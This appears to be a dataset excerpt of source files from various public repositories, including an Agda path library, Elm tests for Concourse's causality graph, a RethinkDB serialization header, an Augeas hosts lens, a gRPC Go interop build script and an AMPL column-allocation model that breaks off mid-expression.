content stringlengths 4 1.04M | lang stringclasses 358 values | score int64 0 5 | repo_name stringlengths 5 114 | repo_path stringlengths 4 229 | repo_licenses listlengths 1 8 |
|---|---|---|---|---|---|
module Star where
open import Prelude
infixr 40 _•_ _++_
infixl 30 _on_
infixr 20 _==>_ _=[_]=>_
data Star {X : Set} (R : Rel X) : Rel X where
ε : {x : X} -> Star R x x
_•_ : {x y z : X} -> R x y -> Star R y z -> Star R x z
_++_ : {X : Set}{R : Rel X}{x y z : X} ->
Star R x y -> Star R y z -> Star R x z
ε ++ ys = ys
(x • xs) ++ ys = x • (xs ++ ys)
_==>_ : {X : Set} -> Rel X -> Rel X -> Set
R ==> S = forall {a b} -> R a b -> S a b
_on_ : {X Y : Set} -> (R : Rel X) -> (f : Y -> X) -> Rel Y
R on f = \a b -> R (f a) (f b)
_=[_]=>_ : {X Y : Set} (R : Rel X) (f : X -> Y) (S : Rel Y) -> Set
R =[ f ]=> S = R ==> S on f
return : {X : Set}{R : Rel X} -> R ==> Star R
return x = x • ε
module JoinMap where
join : {X : Set}{R : Rel X} -> Star (Star R) ==> Star R
join ε = ε
join (xs • xss) = xs ++ join xss
map : forall {X Y R S} -> (f : X -> Y) ->
R =[ f ]=> S -> Star R =[ f ]=> Star S
map f pm ε = ε
map f pm (x • xs) = pm x • map f pm xs
bind : forall {X Y R S} -> (f : X -> Y) ->
R =[ f ]=> Star S -> Star R =[ f ]=> Star S
bind f k m = join (map f k m)
bind : forall {X Y R S} -> (f : X -> Y) ->
R =[ f ]=> Star S -> Star R =[ f ]=> Star S
bind f k ε = ε
bind f k (x • xs) = k x ++ bind f k xs
join : {X : Set}{R : Rel X} -> Star (Star R) ==> Star R
join = bind id id
map : forall {X Y R S} -> (f : X -> Y) ->
R =[ f ]=> S -> Star R =[ f ]=> Star S
map f k = bind f (return · k)
-- Generic length
length : {X : Set}{R : Rel X} -> Star R =[ ! ]=> Star One
length = map ! !
-- Reverse
_op : {X : Set} -> Rel X -> Rel X
(R op) a b = R b a
reverse : {X : Set}{R : Rel X}{a b : X} -> Star R a b -> Star (R op) b a
reverse {X}{R} xs = rev xs ε
where
rev : forall {a b c} ->
Star R a b -> Star (R op) a c -> Star (R op) b c
rev ε ys = ys
rev (x • xs) ys = rev xs (x • ys)
| Agda | 5 | cruhland/agda | examples/AIM6/Path/Star.agda | [
"MIT"
] |
module shape()
{
difference()
{
translate([ -35, -35 ]) intersection()
{
union() {
difference() {
square(100, true);
square(50, true);
}
translate([ 50, 50 ])
square(15, true);
}
rotate(45) translate([ 0, -15 ]) square([ 100, 30 ]);
}
rotate(-45) scale([ 0.7, 1.3 ]) circle(5);
}
import(file = "example009.dxf", layer = "body",
convexity = 6, scale=2);
}
// linear_extrude(convexity = 10, center = true)
shape();
| OpenSCAD | 4 | heristhesiya/OpenJSCAD.org | packages/io/scad-deserializer/tests/examples/example015.scad | [
"MIT"
] |
signature S = sig
type t
val x : t
end
structure M : S = struct
type t = _
val x = 0
end
| UrWeb | 3 | apple314159/urweb | tests/sig_wild.ur | [
"BSD-3-Clause"
] |
module CausalityTest exposing (all)
import Application.Application as Application
import Causality.Causality as Causality
import Common exposing (initCustomOpts)
import Concourse
exposing
( Causality
, CausalityBuild
, CausalityDirection(..)
, CausalityJob
, CausalityResource
, CausalityResourceVersion
)
import Concourse.BuildStatus exposing (BuildStatus(..))
import Data exposing (featureFlags)
import Dict
import Expect
import Graph exposing (Edge, Node)
import List.Extra
import Message.Callback as Callback
import Test exposing (..)
import Test.Html.Query as Query
import Test.Html.Selector
exposing
( class
, id
, text
)
all : Test
all =
describe "causality graph" <|
[ describe "viewing graph" <|
[ test "shows not found if feature flag is disabled" <|
\_ ->
initEnabled False
|> Common.queryView
|> Query.find [ class "notfound" ]
|> Query.has [ text "404" ]
, test "shows not found if response is forbidden" <|
\_ ->
init
|> Application.handleCallback
(Callback.CausalityFetched Data.httpForbidden)
|> Tuple.first
|> Common.queryView
|> Query.find [ class "notfound" ]
|> Query.has [ text "404" ]
, test "shows error message if too large" <|
\_ ->
init
|> Application.handleCallback
(Callback.CausalityFetched Data.httpUnproccessableEntity)
|> Tuple.first
|> Common.queryView
|> Query.find [ id "causality-error" ]
|> Query.has [ text "graph too large" ]
, test "shows error message if there's no causality" <|
\_ ->
init
|> Application.handleCallback
(Callback.CausalityFetched <|
Ok
( Downstream
, Just { jobs = [], builds = [], resources = [], resourceVersions = [] }
)
)
|> Tuple.first
|> Common.queryView
|> Query.find [ id "causality-error" ]
|> Query.has [ text "no causality" ]
]
, describe "constructing downstream" <|
[ test "simple graph with 1 build and output" <|
\_ ->
Causality.constructGraph Downstream simplePipeline
|> Expect.equal
(Graph.fromNodesAndEdges
[ Node 1 <| Causality.Resource "r1" [ Causality.Version 1 someVersion ]
, Node -1 <| Causality.Job "j1" [ Causality.Build 1 "1" BuildStatusSucceeded ]
]
[ Edge 1 -1 () ]
)
, test "builds that fan out and then fan in" <|
\_ ->
Causality.constructGraph Concourse.Downstream fanOutFanInPipeline
|> Expect.equal
(Graph.fromNodesAndEdges
[ Node 1 <| Causality.Resource "r1" [ Causality.Version 1 someVersion ]
, Node 2 <| Causality.Resource "r2" [ Causality.Version 2 someVersion ]
, Node 3 <| Causality.Resource "r3" [ Causality.Version 3 someVersion ]
, Node -1 <| Causality.Job "j1" [ Causality.Build 1 "1" BuildStatusSucceeded ]
, Node -2 <| Causality.Job "j2" [ Causality.Build 2 "1" BuildStatusSucceeded ]
, Node -3 <| Causality.Job "j3" [ Causality.Build 3 "1" BuildStatusSucceeded ]
]
[ Edge 1 -1 ()
, Edge 1 -2 ()
, Edge -1 2 ()
, Edge -2 3 ()
, Edge 2 -3 ()
, Edge 3 -3 ()
]
)
, test "a resource and its descendent feeding into the same build" <|
\_ ->
Causality.constructGraph Concourse.Downstream intermediateOutputsPipeline
|> Expect.equal
(Graph.fromNodesAndEdges
[ Node 1 <| Causality.Resource "r1" [ Causality.Version 1 someVersion ]
, Node 2 <| Causality.Resource "r2" [ Causality.Version 2 someVersion ]
, Node -1 <| Causality.Job "j1" [ Causality.Build 1 "1" BuildStatusSucceeded ]
, Node -2 <| Causality.Job "j2" [ Causality.Build 2 "1" BuildStatusSucceeded ]
]
[ Edge 1 -1 ()
, Edge 1 -2 ()
, Edge -1 2 ()
, Edge 2 -2 ()
]
)
, test "multiple builds of the same job outputing different resource versions" <|
\_ ->
Causality.constructGraph Concourse.Downstream singleJobMultipleBuildsPipeline
|> Expect.equal
(Graph.fromNodesAndEdges
[ Node 1 <| Causality.Resource "r1" [ Causality.Version 1 someVersion ]
, Node 2 <| Causality.Resource "r2" [ Causality.Version 2 someVersion ]
, Node -1 <|
Causality.Job "j1"
[ Causality.Build 2 "2" BuildStatusFailed
, Causality.Build 1 "1" BuildStatusSucceeded
]
]
[ Edge 1 -1 ()
, Edge -1 2 ()
]
)
]
-- basically the same as downstream, but the edges are flipped
, describe "constructing upstream" <|
[ test "simple graph with 1 build and input" <|
\_ ->
Causality.constructGraph Upstream simplePipeline
|> Expect.equal
(Graph.fromNodesAndEdges
[ Node 1 <| Causality.Resource "r1" [ Causality.Version 1 someVersion ]
, Node -1 <| Causality.Job "j1" [ Causality.Build 1 "1" BuildStatusSucceeded ]
]
[ Edge -1 1 () ]
)
]
]
someVersion : Concourse.Version
someVersion =
Dict.fromList [ ( "v", "1" ) ]
-- figure out list of resources and jobs from passed in versions and builds
causality : List CausalityResourceVersion -> List CausalityBuild -> Causality
causality rvs builds =
let
jobs : List CausalityJob
jobs =
List.Extra.uniqueBy .jobId builds
|> List.map (\b -> ( b.jobId, List.filter (\b2 -> b2.jobId == b.jobId) builds ))
|> List.map (\( id, bs ) -> { id = id, name = "j" ++ String.fromInt id, buildIds = List.map .id bs })
resources : List CausalityResource
resources =
List.Extra.uniqueBy .resourceId rvs
|> List.map (\rv -> ( rv.resourceId, List.filter (\rv2 -> rv2.resourceId == rv.resourceId) rvs ))
|> List.map (\( id, rs ) -> { id = id, name = "r" ++ String.fromInt id, resourceVersionIds = List.map .id rs })
in
{ jobs = jobs
, builds = builds
, resources = resources
, resourceVersions = rvs
}
-- single resource feeding into single build
-- resource1 [
-- job1 build1
-- ]
simplePipeline : Causality
simplePipeline =
causality
[ CausalityResourceVersion 1 someVersion 1 [ 1 ] ]
[ CausalityBuild 1 "1" 1 BuildStatusSucceeded [] ]
-- r1 fans out into j1 and j2, the outputs of which fans back into j3
-- resource1 [
-- job1 build1 [
-- resource2 [
-- job3 build1 []
-- ]
-- job2 build1 [
-- resource3 [
-- job3 build1 []
-- ]
-- ]
-- ]
fanOutFanInPipeline : Causality
fanOutFanInPipeline =
causality
[ CausalityResourceVersion 1 someVersion 1 [ 1, 2 ]
, CausalityResourceVersion 2 someVersion 2 [ 3 ]
, CausalityResourceVersion 3 someVersion 3 [ 3 ]
]
[ CausalityBuild 1 "1" 1 BuildStatusSucceeded [ 2 ]
, CausalityBuild 2 "1" 2 BuildStatusSucceeded [ 3 ]
, CausalityBuild 3 "1" 3 BuildStatusSucceeded []
]
-- b2 uses both r1 and a downstream output of r1 as inputs
-- resource1 [
-- job1 build1 [
-- resource2 [
-- job2 build1 []
-- ]
-- ]
-- job2 build1 []
-- ]
intermediateOutputsPipeline : Causality
intermediateOutputsPipeline =
causality
[ CausalityResourceVersion 1 someVersion 1 [ 1, 2 ]
, CausalityResourceVersion 2 someVersion 2 [ 2 ]
]
[ CausalityBuild 1 "1" 1 BuildStatusSucceeded [ 2 ]
, CausalityBuild 2 "1" 2 BuildStatusSucceeded []
]
-- j1 has 2 builds, one of the builds generated an output while the otherone failed
-- resource1 [
-- job1 build2 []
-- job1 build1 [resource2]
-- ]
singleJobMultipleBuildsPipeline : Causality
singleJobMultipleBuildsPipeline =
causality
[ CausalityResourceVersion 1 someVersion 1 [ 1, 2 ]
, CausalityResourceVersion 2 someVersion 2 []
]
[ CausalityBuild 1 "1" 1 BuildStatusSucceeded [ 2 ]
, CausalityBuild 2 "2" 1 BuildStatusFailed []
]
resourceVersionId : Int
resourceVersionId =
1
initEnabled : Bool -> Application.Model
initEnabled causalityEnabled =
Common.initCustom { initCustomOpts | featureFlags = { featureFlags | resource_causality = causalityEnabled } }
("/teams/"
++ Data.teamName
++ "/pipelines/"
++ Data.pipelineName
++ "/resources/"
++ Data.resourceName
++ "/causality/"
++ String.fromInt resourceVersionId
++ "/downstream"
)
init : Application.Model
init =
initEnabled True
| Elm | 5 | Caprowni/concourse | web/elm/tests/CausalityTest.elm | [
"Apache-2.0"
] |
(* Parsing /etc/hosts *)
module Hosts =
autoload xfm
let sep_tab = Util.del_ws_tab
let sep_spc = Util.del_ws_spc
let eol = del /[ \t]*\n/ "\n"
let indent = del /[ \t]*/ ""
let comment = Util.comment
let empty = [ del /[ \t]*#?[ \t]*\n/ "\n" ]
let word = /[^# \n\t]+/
let record = [ seq "host" . indent .
[ label "addr" . store word ] . sep_tab .
[ label "canonical" . store word ] .
[ label "alias" . sep_spc . store word ]*
. (comment|eol) ]
let lns = ( empty | comment | record ) *
let xfm = transform lns (incl "/etc/hosts")
| Augeas | 4 | mcarbonneaux/php-augeas | tests/loadpath/hosts.aug | [
"PHP-3.01"
] |
# XCB_UTIL_M4_WITH_INCLUDE_PATH
# ------------------------------
#
# This macro attempts to locate an m4 macro processor which supports
# -I option and is only useful for modules relying on M4 in order to
# expand macros in source code files.
#
# M4: variable holding the path to an usable m4 program.
#
# This macro requires Autoconf 2.62 or later as it is relying upon
# AC_PATH_PROGS_FEATURE_CHECK macro. NOTE: As soon as the minimum
# required version of Autoconf for Xorg is bumped to 2.62, this macro
# is supposed to be shipped with xorg/util/macros.
#
AC_DEFUN([XCB_UTIL_M4_WITH_INCLUDE_PATH], [
AC_CACHE_CHECK([for m4 that supports -I option], [ac_cv_path_M4],
[AC_PATH_PROGS_FEATURE_CHECK([M4], [m4 gm4],
[[$ac_path_M4 -I. /dev/null > /dev/null 2>&1 && \
ac_cv_path_M4=$ac_path_M4 ac_path_M4_found=:]],
[AC_MSG_ERROR([could not find m4 that supports -I option])],
[$PATH:/usr/gnu/bin])])
AC_SUBST([M4], [$ac_cv_path_M4])
]) # XCB_UTIL_M4_WITH_INCLUDE_PATH
| M4 | 4 | collinwright/nixpkgs | pkgs/development/libraries/xcb-util-cursor/m4/xcb_util_m4_with_include_path.m4 | [
"MIT"
] |
module.exports = 'react-dom';
| JavaScript | 1 | 1shenxi/webpack | test/configCases/entry/depend-on-simple/node_modules/react-dom.js | [
"MIT"
] |
#!/bin/bash
# Copyright 2015 gRPC authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Builds Go interop server and client in a base image.
set -e
# Clone just the grpc-go source code without any dependencies.
# We are cloning from a local git repo that contains the right revision
# to test instead of using "go get" to download from Github directly.
git clone --recursive /var/local/jenkins/grpc-go src/google.golang.org/grpc
# Get all gRPC Go dependencies
(cd src/google.golang.org/grpc && make deps && make testdeps)
# copy service account keys if available
cp -r /var/local/jenkins/service_account $HOME || true
# Build the interop client and server
(cd src/google.golang.org/grpc/interop/client && go install)
(cd src/google.golang.org/grpc/interop/server && go install)
| Shell | 4 | samotarnik/grpc | tools/dockerfile/interoptest/grpc_interop_go1.8/build_interop.sh | [
"Apache-2.0"
] |
2016-03-19 12:53:19 > fsociety (whoami@localhost) has joined &##systemau
2016-03-19 12:53:19 - Channel &##systemau: 17 nicks (2 ops, 3 halfops, 10 voices, 2 normals)
2016-03-19 12:54:22 - Mode &##systemau [+v BliTz] by localhost
2016-03-19 12:54:56 < BliTz (76561197992831293@steam) has quit (Leaving...)
| IRC log | 0 | 0x4b1dN/2016-dots | misc/weechat/logs/irc.bitlbee.&##systemau.weechatlog | [
"MIT"
] |
#ifndef CONTAINERS_ARCHIVE_VERSIONED_HPP_
#define CONTAINERS_ARCHIVE_VERSIONED_HPP_
#include <functional>
#include "containers/archive/archive.hpp"
#include "version.hpp"
namespace archive_internal {
class bogus_made_up_type_t;
} // namespace archive_internal
// These are generally universal. They must not have their behavior change -- except
// if we remove some cluster_version_t value, in which case... maybe would fail on a
// range error with the specific removed values. Or maybe, we would do something
// differently.
inline void serialize_cluster_version(write_message_t *wm, cluster_version_t v) {
int8_t raw = static_cast<int8_t>(v);
serialize<cluster_version_t::LATEST_OVERALL>(wm, raw);
}
inline MUST_USE archive_result_t deserialize_cluster_version(
read_stream_t *s,
cluster_version_t *thing,
const std::function<void()> &obsolete_cb) {
// Initialize `thing` to *something* because GCC 4.6.3 thinks that `thing`
// could be used uninitialized, even when the return value of this function
// is checked through `guarantee_deserialization()`.
// See https://github.com/rethinkdb/rethinkdb/issues/2640
*thing = cluster_version_t::LATEST_OVERALL;
int8_t raw;
archive_result_t res = deserialize<cluster_version_t::LATEST_OVERALL>(s, &raw);
if (bad(res)) { return res; }
if (raw == static_cast<int8_t>(obsolete_cluster_version_t::v1_13)
|| raw == static_cast<int8_t>(obsolete_cluster_version_t::v1_13_2)) {
obsolete_cb();
crash("Outdated index handling did not crash or throw.");
} else {
if (raw >= static_cast<int8_t>(cluster_version_t::v1_14)
&& raw <= static_cast<int8_t>(cluster_version_t::v2_5)) {
*thing = static_cast<cluster_version_t>(raw);
} else {
throw archive_exc_t{"Unrecognized cluster serialization version."};
}
}
return res;
}
inline MUST_USE archive_result_t deserialize_reql_version(
read_stream_t *s, reql_version_t *thing,
const std::function<void(obsolete_reql_version_t)> &obsolete_cb) {
// Initialize `thing` to *something* because GCC 4.6.3 thinks that `thing`
// could be used uninitialized, even when the return value of this function
// is checked through `guarantee_deserialization()`.
// See https://github.com/rethinkdb/rethinkdb/issues/2640
*thing = reql_version_t::LATEST;
int8_t raw;
archive_result_t res = deserialize_universal(s, &raw);
if (bad(res)) { return res; }
if (raw < static_cast<int8_t>(reql_version_t::EARLIEST)) {
guarantee(raw >= static_cast<int8_t>(obsolete_reql_version_t::EARLIEST)
&& raw <= static_cast<int8_t>(obsolete_reql_version_t::LATEST));
obsolete_cb(static_cast<obsolete_reql_version_t>(raw));
crash("Outdated index handling did not crash or throw.");
} else {
// This is the same rassert in `ARCHIVE_PRIM_MAKE_RANGED_SERIALIZABLE`.
guarantee(raw >= static_cast<int8_t>(reql_version_t::EARLIEST)
&& raw <= static_cast<int8_t>(reql_version_t::LATEST));
*thing = static_cast<reql_version_t>(raw);
}
return res;
}
// Serializes a value for a given version. DOES NOT SERIALIZE THE VERSION NUMBER!
template <class T>
void serialize_for_version(cluster_version_t version, write_message_t *wm,
const T &value) {
// We currently only support serializing either the current disk or current
// cluster version, no previous versions.
if (version == cluster_version_t::CLUSTER) {
serialize<cluster_version_t::CLUSTER>(wm, value);
} else if (version == cluster_version_t::LATEST_DISK) {
serialize<cluster_version_t::LATEST_DISK>(wm, value);
} else {
crash("Attempted to serialize for a non-current version");
}
}
// Deserializes a value, assuming it's serialized for a given version. (This doesn't
// deserialize any version numbers.)
template <class T>
archive_result_t deserialize_for_version(cluster_version_t version,
read_stream_t *s,
T *thing) {
switch (version) {
case cluster_version_t::v1_14:
return deserialize<cluster_version_t::v1_14>(s, thing);
case cluster_version_t::v1_15:
return deserialize<cluster_version_t::v1_15>(s, thing);
case cluster_version_t::v1_16:
return deserialize<cluster_version_t::v1_16>(s, thing);
case cluster_version_t::v2_0:
return deserialize<cluster_version_t::v2_0>(s, thing);
case cluster_version_t::v2_1:
return deserialize<cluster_version_t::v2_1>(s, thing);
case cluster_version_t::v2_2:
return deserialize<cluster_version_t::v2_2>(s, thing);
case cluster_version_t::v2_3:
return deserialize<cluster_version_t::v2_3>(s, thing);
case cluster_version_t::v2_4:
return deserialize<cluster_version_t::v2_4>(s, thing);
case cluster_version_t::v2_5_is_latest:
return deserialize<cluster_version_t::v2_5_is_latest>(s, thing);
default:
unreachable("deserialize_for_version: unsupported cluster version");
}
}
// Some serialized_size needs to be visible, apparently, so that
// serialized_size_for_version will actually parse.
template <cluster_version_t W>
size_t serialized_size(const archive_internal::bogus_made_up_type_t &);
template <class T>
size_t serialized_size_for_version(cluster_version_t version,
const T &thing) {
switch (version) {
case cluster_version_t::v1_14:
return serialized_size<cluster_version_t::v1_14>(thing);
case cluster_version_t::v1_15:
return serialized_size<cluster_version_t::v1_15>(thing);
case cluster_version_t::v1_16:
return serialized_size<cluster_version_t::v1_16>(thing);
case cluster_version_t::v2_0:
return serialized_size<cluster_version_t::v2_0>(thing);
case cluster_version_t::v2_1:
return serialized_size<cluster_version_t::v2_1>(thing);
case cluster_version_t::v2_2:
return serialized_size<cluster_version_t::v2_2>(thing);
case cluster_version_t::v2_3:
return serialized_size<cluster_version_t::v2_3>(thing);
case cluster_version_t::v2_4:
return serialized_size<cluster_version_t::v2_4>(thing);
case cluster_version_t::v2_5_is_latest:
return serialized_size<cluster_version_t::v2_5_is_latest>(thing);
default:
unreachable("serialize_size_for_version: unsupported version");
}
}
// We want to express explicitly whether a given serialization function
// is used for cluster messages or disk serialization in case the latest cluster
// and latest disk versions diverge.
//
// If you see either the INSTANTIATE_SERIALIZE_FOR_CLUSTER_AND_DISK
// of INSTANTIATE_SERIALIZE_FOR_DISK macro used somewhere, you know that if you
// change the serialization format of that type that will break the disk format,
// and you should consider writing a deserialize function for the older versions.
#define INSTANTIATE_SERIALIZE_FOR_DISK(typ) \
template void serialize<cluster_version_t::LATEST_DISK>( \
write_message_t *, const typ &)
#define INSTANTIATE_SERIALIZE_FOR_CLUSTER(typ) \
template void serialize<cluster_version_t::CLUSTER>( \
write_message_t *, const typ &)
#define INSTANTIATE_DESERIALIZE_FOR_CLUSTER(typ) \
template archive_result_t deserialize<cluster_version_t::CLUSTER>( \
read_stream_t *, typ *)
#ifdef CLUSTER_AND_DISK_VERSIONS_ARE_SAME
#define INSTANTIATE_SERIALIZE_FOR_CLUSTER_AND_DISK(typ) \
template void serialize<cluster_version_t::CLUSTER>( \
write_message_t *, const typ &)
#else
#define INSTANTIATE_SERIALIZE_FOR_CLUSTER_AND_DISK(typ) \
template void serialize<cluster_version_t::CLUSTER>( \
write_message_t *, const typ &); \
template void serialize<cluster_version_t::LATEST_DISK>( \
write_message_t *, const typ &)
#endif
#define INSTANTIATE_DESERIALIZE_SINCE_v1_13(typ) \
template archive_result_t deserialize<cluster_version_t::v1_14>( \
read_stream_t *, typ *); \
template archive_result_t deserialize<cluster_version_t::v1_15>( \
read_stream_t *, typ *); \
template archive_result_t deserialize<cluster_version_t::v1_16>( \
read_stream_t *, typ *); \
template archive_result_t deserialize<cluster_version_t::v2_0>( \
read_stream_t *, typ *); \
template archive_result_t deserialize<cluster_version_t::v2_1>( \
read_stream_t *, typ *); \
template archive_result_t deserialize<cluster_version_t::v2_2>( \
read_stream_t *, typ *); \
template archive_result_t deserialize<cluster_version_t::v2_3>( \
read_stream_t *, typ *); \
template archive_result_t deserialize<cluster_version_t::v2_4>( \
read_stream_t *, typ *); \
template archive_result_t deserialize<cluster_version_t::v2_5_is_latest>( \
read_stream_t *, typ *)
#define INSTANTIATE_SERIALIZABLE_SINCE_v1_13(typ) \
INSTANTIATE_SERIALIZE_FOR_CLUSTER_AND_DISK(typ); \
INSTANTIATE_DESERIALIZE_SINCE_v1_13(typ)
#define INSTANTIATE_DESERIALIZE_SINCE_v1_16(typ) \
template archive_result_t deserialize<cluster_version_t::v1_16>( \
read_stream_t *, typ *); \
template archive_result_t deserialize<cluster_version_t::v2_0>( \
read_stream_t *, typ *); \
template archive_result_t deserialize<cluster_version_t::v2_1>( \
read_stream_t *, typ *); \
template archive_result_t deserialize<cluster_version_t::v2_2>( \
read_stream_t *, typ *); \
template archive_result_t deserialize<cluster_version_t::v2_3>( \
read_stream_t *, typ *); \
template archive_result_t deserialize<cluster_version_t::v2_4>( \
read_stream_t *, typ *); \
template archive_result_t deserialize<cluster_version_t::v2_5_is_latest>( \
read_stream_t *, typ *)
#define INSTANTIATE_SERIALIZABLE_SINCE_v1_16(typ) \
INSTANTIATE_SERIALIZE_FOR_CLUSTER_AND_DISK(typ); \
INSTANTIATE_DESERIALIZE_SINCE_v1_16(typ)
#define INSTANTIATE_DESERIALIZE_SINCE_v2_1(typ) \
template archive_result_t deserialize<cluster_version_t::v2_1>( \
read_stream_t *, typ *); \
template archive_result_t deserialize<cluster_version_t::v2_2>( \
read_stream_t *, typ *); \
template archive_result_t deserialize<cluster_version_t::v2_3>( \
read_stream_t *, typ *); \
template archive_result_t deserialize<cluster_version_t::v2_4>( \
read_stream_t *, typ *); \
template archive_result_t deserialize<cluster_version_t::v2_5_is_latest>( \
read_stream_t *, typ *)
#define INSTANTIATE_SERIALIZABLE_SINCE_v2_1(typ) \
INSTANTIATE_SERIALIZE_FOR_CLUSTER_AND_DISK(typ); \
INSTANTIATE_DESERIALIZE_SINCE_v2_1(typ)
#define INSTANTIATE_DESERIALIZE_SINCE_v2_2(typ) \
template archive_result_t deserialize<cluster_version_t::v2_2>( \
read_stream_t *, typ *); \
template archive_result_t deserialize<cluster_version_t::v2_3>( \
read_stream_t *, typ *); \
template archive_result_t deserialize<cluster_version_t::v2_4>( \
read_stream_t *, typ *); \
template archive_result_t deserialize<cluster_version_t::v2_5_is_latest>( \
read_stream_t *, typ *)
#define INSTANTIATE_SERIALIZABLE_SINCE_v2_2(typ) \
INSTANTIATE_SERIALIZE_FOR_CLUSTER_AND_DISK(typ); \
INSTANTIATE_DESERIALIZE_SINCE_v2_2(typ)
#define INSTANTIATE_DESERIALIZE_SINCE_v2_3(typ) \
template archive_result_t deserialize<cluster_version_t::v2_3>( \
read_stream_t *, typ *); \
template archive_result_t deserialize<cluster_version_t::v2_4>( \
read_stream_t *, typ *); \
template archive_result_t deserialize<cluster_version_t::v2_5_is_latest>( \
read_stream_t *, typ *)
#define INSTANTIATE_SERIALIZABLE_SINCE_v2_3(typ) \
INSTANTIATE_SERIALIZE_FOR_CLUSTER_AND_DISK(typ); \
INSTANTIATE_DESERIALIZE_SINCE_v2_3(typ)
#define INSTANTIATE_DESERIALIZE_SINCE_v2_4(typ) \
template archive_result_t deserialize<cluster_version_t::v2_4>( \
read_stream_t *, typ *); \
template archive_result_t deserialize<cluster_version_t::v2_5_is_latest>( \
read_stream_t *, typ *)
#define INSTANTIATE_SERIALIZABLE_SINCE_v2_4(typ) \
INSTANTIATE_SERIALIZE_FOR_CLUSTER_AND_DISK(typ); \
INSTANTIATE_DESERIALIZE_SINCE_v2_4(typ)
#define INSTANTIATE_DESERIALIZE_SINCE_v2_5(typ) \
template archive_result_t deserialize<cluster_version_t::v2_5_is_latest>( \
read_stream_t *, typ *);
#define INSTANTIATE_SERIALIZABLE_SINCE_v2_5(typ) \
INSTANTIATE_SERIALIZE_FOR_CLUSTER_AND_DISK(typ); \
INSTANTIATE_DESERIALIZE_SINCE_v2_5(typ)
#define INSTANTIATE_SERIALIZABLE_FOR_CLUSTER(typ) \
INSTANTIATE_SERIALIZE_FOR_CLUSTER(typ); \
template archive_result_t deserialize<cluster_version_t::CLUSTER>( \
read_stream_t *, typ *)
#endif // CONTAINERS_ARCHIVE_VERSIONED_HPP_
| C++ | 4 | zadcha/rethinkdb | src/containers/archive/versioned.hpp | [
"Apache-2.0"
] |
<html>
<head>
<title>Error</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
</head>
<body bgcolor="#FFFFFF">
<h2>An error has occurred.</h2>
<p><strong>Error Number:</strong> [Error_Code]<br>
<strong>Error Message:</strong> [Error_Msg]</p>
<p><strong>File Error:</strong> [File_CurrentError]</p>
</body>
</html>
| Lasso | 2 | fourplusone/SubEthaEdit | Documentation/ModeDevelopment/Reference Files/LassoScript-HTML/itpage/error.lasso | [
"MIT"
] |
reset;
option randseed'';
option solver cplex;
######## Definition of Workload ##########
param N := 50; # number of columns
param Q := 10*N; # number of queries
param dd :=10; # scan costs main memory
param dr := 1; # scan costs second storage
param a {i in 1..N} := Uniform(1,100); # size of column i
param b {j in 1..Q} := round(Uniform(1,2000)); # frequency of query j
param Z {j in 1..Q} := round(Uniform(0.5,10)); # average number of columns used in query j
set q {j in 1..Q} := union {1..Z[j]} {round(Uniform(1,N^(1/0.2))^0.2)}; # query j
param g {i in 1..N} := sum{j in 1..Q:card({i} inter q[j])=1} b[j];# frequency of column i
param gmax := max{i in 1..N} g[i]; # maximal frequency
param s {i in 1..N} := Uniform(0,0.1)+0.05*(g[i]/gmax)^0.01; # selectivity column i
param y {i in 1..N} := round(Uniform(0,1)); # current/old allocation
param beta default 0; # penalty reallocation
param w default 0.2; # relative budget
param A2 := sum{i in 1..N} a[i]; # maximal budget
######## Integer Solution via Linear Solver ##########
param performance_int;
param RAMused_int;
var x {i in 1..N} <=1, >=0, binary; # column i in DRAM (1 yes) or (0 no)
var z {i in 1..N} <=1, >=0, binary; # column i im DRAM (1 yes) or (0 no)
var f {j in 1..Q} = sum{i in q[j]} (dr*x[i]+dd*(1-x[i])) * a[i]*prod{k in q[j]:s[k]<s[i]} s[k];
# scan costs for query j
minimize zfkt_int: sum{j in 1..Q} b[j]*f[j] + beta * sum{i in 1..N} a[i]*z[i];
subject to nb1a: sum{i in 1..N} a[i]*x[i] <= w*A2; # budget constraint
subject to nb2a {i in 1..N}: y[i] - x[i] <= z[i]; # linearization reallocation
subject to nb3a {i in 1..N}: x[i] - y[i] <= z[i];
objective zfkt_int; solve; # solve integer program
let performance_int := sum{j in 1..Q} b[j]*f[j];
let RAMused_int :=(sum{i in 1..N} a[i]*x[i])/A2;
display x; # show column selection
display performance_int, RAMused_int;
display N, Q, _solve_elapsed_time;
######## Continuous Solution via Linear Solver ##########
param performance_cont;
param RAMused_cont;
param alpha default 100000; # penalty for budget used
var x2{i in 1..N} <=1, >=0; # column i in DRAM (1 yes) or (0 no)
var z2{i in 1..N} <=1, >=0; # column i im DRAM (1 yes) or (0 no)
var f2{j in 1..Q} = sum{i in q[j]} (dr*x2[i]+dd*(1-x2[i])) * a[i]*prod{k in q[j]:s[k]<s[i]} s[k];
# scan costs for query j
minimize zfkt_cont: sum{j in 1..Q} b[j]*f2[j] + alpha * sum{i in 1..N} a[i]*x2[i]
+ beta * sum{i in 1..N} a[i]*z2[i];
#subject to nb0 {i in 1..N:a[i]>w*A2}: x2[i] = 0;
subject to nb2b {i in 1..N}: y[i] - x2[i] <= z2[i]; # linearization reallocation
subject to nb3b {i in 1..N}: x2[i] - y[i] <= z2[i];
drop nb1a; drop nb2a; drop nb3a;
fix x; fix z;
objective zfkt_cont; solve; # solve continuous problem
let performance_cont := sum{j in 1..Q} b[j]*f2[j];
let RAMused_cont :=(sum{i in 1..N} a[i]*x2[i])/A2;
display x2; # show column selection
display performance_cont, RAMused_cont;
display N, Q, _solve_elapsed_time;
#end;
######## Definition of Numerical Allocation Strategies ##########
#### (H1) most occurences - best g_i
set kmostused {i in 0..N} := if i=0 then {} else if i=N then {ii in 1..N:g[ii]>0} else kmostused[i+1] diff
{min{k in kmostused[i+1]:
g[k]=min{j in kmostused[i+1]} g[j]} k};
param use := if w>0 then max{k in 0..N: sum{j in kmostused[k]} a[j]<= w*A2} k;
param space {k in 0..N} := (sum{j in kmostused[k]} a[j]) / A2;
set order ordered default {}; for {i in 1..N} let order:=order union kmostused[i];;
######## (H2) best selectivity - best s_i
set kmostused2 {i in 0..N} := if i=0 then {} else if i=N then {ii in 1..N:g[ii]>0} else kmostused2[i+1] diff
{min{k in kmostused2[i+1]:
